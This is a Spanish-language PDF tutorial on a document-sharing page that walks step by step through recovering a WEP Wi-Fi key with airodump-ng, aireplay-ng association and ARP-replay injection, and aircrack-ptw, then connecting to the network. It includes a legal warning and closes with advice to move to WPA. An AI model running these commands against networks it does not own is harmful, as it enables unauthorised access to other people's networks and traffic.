Minituto Inseguridad Claves Wep

  • April 2020
  • PDF

This document was uploaded by user and they confirmed that they have the permission to share it. If you are author or own the copyright of this book, please report to us by using this DMCA report form. Report DMCA


Overview

Download & View Minituto Inseguridad Claves Wep as PDF for free.

More details

  • Words: 1,236
  • Pages: 11
Inseguridad WEP redes inalámbricas

Inseguridad WEP redes inalámbricas

http://www.minituto.com || http://minituto.blogspot.com Pagina 1 de 11

Inseguridad WEP redes inalámbricas

Índice Introducción ............................................................................................................. 3 Advertencia................................................................................................................ 3 1. Arranque y logueo ..................................................................................... 3 2. Preparando el entorno de trabajo ................................................. 3 3. Preparando la interfaz de red......................................................... 3 4. Airodump-ng.................................................................................................... 4 5. El ataque......................................................................................................... 5 a. Asociacion con el AP .......................................................................... 5 b. Airodump a la escucha........................................................................ 6 c. Inyección..................................................................................................... 7 7. Prueba.............................................................................................................. 10 8. Conclusión .................................................................................................... 11

Esta obra puede ser reproducida siempre que se haga referencia a http://www.minituto.com como autor de la misma.

http://www.minituto.com || http://minituto.blogspot.com Pagina 2 de 11

Inseguridad WEP redes inalámbricas

Introducción En estos días que corren en los que parece que el cable sobra y que todo lo que es inalámbrico es lo más de lo más, nos encontramos con la tesitura de si la red inalámbrica que tenemos en casa es lo suficientemente segura o no. “Mi red claro que es segura, pos quien va a saber que mi chiquillo se llama manolillo y nació en el 1934. Pues mi clave es manolillo1934”. La verdad es que la seguridad inalámbrica está tan entrecomillada como la frase anterior. Hoy en día no existe un cifrado para las claves de las redes inalámbricas seguro al 100% pero de lo que no cabe duda es que WEP no es para nada seguro. Esto viene a ser un Paso a paso para la obtención de contraseña WEP mediante el uso de una tarjeta Intel ipw3945 (tarjeta común en los portátiles centrino) Software necesario: Versión lite de wifislax 3.1 (http://www.wifislax.com) Advertencia Este minituto va orientado a resolver nuestras dudas personales sobre si nuestra red es segura o no. Usar lo que aquí se detalla contra redes ajenas puede constituir un delito tipificado en el código penal de vuestro país. Se responsable, nosotros lo somos. 1. Arranque y logueo Iniciamos la maquina con el cd de wifislax y pulsamos en la primera opción (KDE). Posteriormente nos logueamos en el sistema usando user: root password: toor 2. Preparando el entorno de trabajo Abrimos 3 ventanas de Terminal Konsole 3. Preparando la interfaz de red En la primera de las consolas vamos a establecer el ratio de transferencia de la tarjeta de red inalámbrica a 1M para poder realizar la posterior inyección de tráfico. Primeramente revisamos que tenemos cargado el controlador correcto, para eso ejecutamos iwconfig http://www.minituto.com || http://minituto.blogspot.com Pagina 3 de 11

Inseguridad WEP redes inalámbricas

wifislax ~ # iwconfig lo no wireless extensions. eth2

no wireless extensions.

wifi0

unassociated Mode:Monitor

rtap0

no wireless extensions.

ESSID:off/any Channel=1 Bit Rate=54 Mb/s

En el caso de que no tengamos cargado el controlador no veremos la tarjeta de red rtap0. Para cargar el controlador solo tendremos que usar el comando modprobe ipwraw y para descargarlo modprobe -r ipwraw. Bueno, contamos con que ya tenemos cargado el controlador, ahora vamos a cambiar el ratio de transferencia de la tarjeta de red wifi0 wifislax ~ # iwconfig wifi0 rate 1M

Una vez realizado esto, reiniciamos la interfaz de red wifi0 y comprobamos que ha tomado el ratio de transferencia correctamente. wifislax ~ # ifconfig wifi0 down wifislax ~ # ifconfig wifi0 up wifislax ~ # iwconfig lo no wireless extensions. eth2

no wireless extensions.

wifi0

unassociated Mode:Monitor

rtap0

no wireless extensions.

ESSID:off/any Channel=1 Bit Rate=1 Mb/s

4. Airodump-ng Airodump-ng es una pequeña utilidad de tipo sniffer que nos permite ver el tráfico que puede leer nuestra tarjeta así como nos brinda la posibilidad de capturar los paquetes necesarios. Localizamos nuestra red de destino con la que demostraremos que la encriptación WEP no es demasiado segura que digamos. wifislax ~ # airodump-ng wifi0

y nos aparecerá

http://www.minituto.com || http://minituto.blogspot.com Pagina 4 de 11

Inseguridad WEP redes inalámbricas

Ahora escucharemos en el canal donde se localice la red destino, en nuestro caso, WLAN_AB. wifislax ~ # airodump-ng -c 9 wifi0

nota: Para cancelar airodump-ng pulsamos ctrl + C 5. El ataque Aireplay-ng nos permite realizar la inyección de tráfico sobre la red que queramos. Para ello, primero tenemos que hacer una asociación de nuestro adaptador con el Punto de Acceso (AP) de la red que queramos y posteriormente pondremos el programa a la escucha de paquetes de datos y en cuanto tenga 1 el programa automáticamente lo replicará generando así tráfico en la red. Esto lo realizaremos en la 2 ventana de consola que abrimos. a. Asociacion con el AP aireplay-ng -1 0 -a BSSID -e ESSID -h MAC_INTERFAZ INTERFAZ Primeramente en la consola 1 lanzamos airodump apuntando al canal del AP, y luego lanzamos aireplay-ng para asociarnos al dispositivo. wifislax ~ # aireplay-ng -1 0 -a 00:13:XX:XX:EC:XX -e WLAN_BA -h 00:11:22:33:44:55 wifi0 20:54:55 Waiting for beacon frame (BSSID: 00:13:49:88:EC:0F) 20:54:55 Sending Authentication Request 20:54:55 Authentication successful 20:54:55 Sending Association Request http://www.minituto.com || http://minituto.blogspot.com Pagina 5 de 11

Inseguridad WEP redes inalámbricas

20:54:56

Association successful :-)

A veces cuesta que se asocie el dispositivo, probar a desconectar y conectar airodump y a relanzar aireplay hasta conseguir la asociación. b. Airodump a la escucha Primero accionaremos airodump apuntando al canal (si no lo hiciéramos bloquearíamos el PC y tendríamos que volver a empezar) y escribiendo el archivo salida. wifislax ~ # airodump-ng -c 9 -w salida wifi0

Poner atención en la nomenclatura OPN junto al ESSID

http://www.minituto.com || http://minituto.blogspot.com Pagina 6 de 11

Inseguridad WEP redes inalámbricas

En la consola 2 preparamos aireplay para que se ponga a la escucha de un paquete arp y en cuanto tenga 1 empezará automáticamente la inyección. c. Inyección aireplay-ng -3 -b BSSID -e ESSID -h MAC_INTERFAZ INTERFAZ

El programa se mantiene a la escucha hasta que encuentra un paquete con el cual pueda realizar la inyección, una vez lo encuentra, empieza a replicarse automáticamente.

Si miramos la ventana de airodump vemos como el valor data va incrementándose.

http://www.minituto.com || http://minituto.blogspot.com Pagina 7 de 11

Inseguridad WEP redes inalámbricas

Son necesarios poco más de 50000 data para poder obtener una clave de tipo WEP. 6. Paso Final Una vez estamos capturando paquetes, en la tercera ventana ejecutaremos periódicamente el comando: wifislax ~ # aircrack-ptw salida-01.cap

(el 01 cambia, cuando lanzamos airodump numera automáticamente)

http://www.minituto.com || http://minituto.blogspot.com Pagina 8 de 11

Inseguridad WEP redes inalámbricas

Con esto, sabremos si ya tenemos la contraseña WEP de la red sin necesidad de detener el proceso. Una vez finalizado correctamente el proceso, tras el cual podemos detener airodump y aireplay, podemos ver la clave en formato hexagecimal.

Utilizando la utilidad incluida también en wifislax llamada KSPREAD podemos obtener la clave en formato ASCII, para http://www.minituto.com || http://minituto.blogspot.com Pagina 9 de 11

Inseguridad WEP redes inalámbricas

ello, convertimos el hexagecimal a decimal y posteriormente, el número obtenido lo convertimos a char: Funciones: hex2dec y ascii2char

7. Prueba Para finalizar reiniciamos la maquina con Windows y comprobamos que podemos establecer la conexión a la red:

Nos conectamos …. http://www.minituto.com || http://minituto.blogspot.com Pagina 10 de 11

Inseguridad WEP redes inalámbricas

Probamos a navegar con resultado satisfactorio.

8. Conclusión Las claves WEP son fácilmente vulnerables, incluso en el caso de telefónica, las claves WEP que se utilizan en los routers por defecto son fácilmente desencriptables ya que todas siguen un patrón. Actualice su contraseña WEP a WPA, es un consejo y sospeche si las luces de su router parpadean sin que haya ningún ordenador conectado a él. Cambiar la contraseña periódicamente puede producir que el posible atacante desista de su intento. http://www.minituto.com || http://minituto.blogspot.com Pagina 11 de 11

Related Documents

Inseguridad
July 2020 11
Inseguridad
October 2019 17
Wep
July 2020 10
Wep
November 2019 17
Claves
October 2019 61